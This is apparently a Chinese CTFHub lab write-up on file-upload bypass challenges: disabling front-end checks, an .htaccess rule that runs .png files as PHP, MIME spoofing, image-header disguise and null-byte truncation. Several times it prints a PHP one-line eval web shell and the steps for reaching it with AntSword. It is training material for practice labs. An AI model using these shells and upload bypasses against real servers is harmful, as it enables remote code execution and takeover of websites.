ctfhub-前端验证,.htaccess,MIME绕过,⽂件头检查,00截
断,双写后缀
⽬录
⽂件上传-前端验证
上传⽂件时,客户端的javascript会对⽂件的类型进⾏⼀个校验,只允许 “.jpg” “.png” ".gif"的⽂件上传,于是关掉他
about:config
⼀句⽊马
<?php @eval($_POST['123']); ?>
命名为1.php之后上传⽂件,⽤蚁剑打开他会发现flag
⽂件上传-.htaccess
.htaccess是⼀个纯⽂本⽂件,存放着Apache服务器配置相关的指令。
.htaccess主要的作⽤有:URL重写、⾃定义错误页⾯、MIME类型配置以及访问权限控制等。主要体现在伪静态的应⽤、图⽚防盗链、⾃定义404错误页⾯、阻⽌/允许特定IP/IP段、⽬录浏览与主页、禁⽌访问指定⽂件类型、⽂件密码保护等。
.htaccess的⽤途范围主要针对当前⽬录。
----------------------------------------------------------
AddType application/x-httpd-php .png//凡是png⽂件都当作php⽂件来解
以他为内容构建 .htaccess⽂件(特别注意这⾥⽂件名不可随意更改,因为 .htaccess 是配置⽂件)
<?php @eval($_POST["pass"]);?>
以他为内容命名为20.png
在题⽬页⾯先上传.htaccess,之后在上传20.png
htaccess伪静态文件之后⽤蚁剑解开就可得到flag
⽂件上传-MIME绕过
MIME多⽤途互联⽹邮件扩展类型。是设定某种扩展名的⽂件⽤⼀种应⽤程序来打开的⽅式类型,当该扩展名⽂件被访问的时候,浏览器会⾃动使⽤指定应⽤程序来打开。多⽤于指定⼀些客户端⾃定义的⽂件名,以及⼀些媒体⽂件打开⽅式.
-
---------------------------------------------------------
<?php @eval($_POST["pass"]);?>
以他为内容⽂件名为20.php
打开题⽬页⾯上传20.php并进⾏抓包
修改为image/jpg绕过验证,
放包,⽤蚁剑flag
⽂件上传-⽂件头检查
写⼀个图⽚马
之后将图⽚马命名为1.php,上传之后抓包(注意修改修改为image/png绕过检查)
之后蚁剑来⼀遍flag就到了
⽂件上传-00截断
00截断的原理,就是利⽤0x00是字符串的结束标识符,攻击者可以利⽤⼿动添加字符串标识符的⽅式来将后⾯的内容进⾏截断,⽽后⾯的内容⼜可以帮助我们绕过检测。 需要注意的是,0x00截断是16进制的截断,需要修改16进制的数据头,如果使⽤burp,就要在Hex中对数据进⾏改写。
-------------------------------------------------------------------
制作⼀个名为1.jpg的图⽚马上传抓包(注意红⾊字体后⾯加上1.php%00(1.php是我⾃⼰的⽂件名)
放包⽤蚁剑flag
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论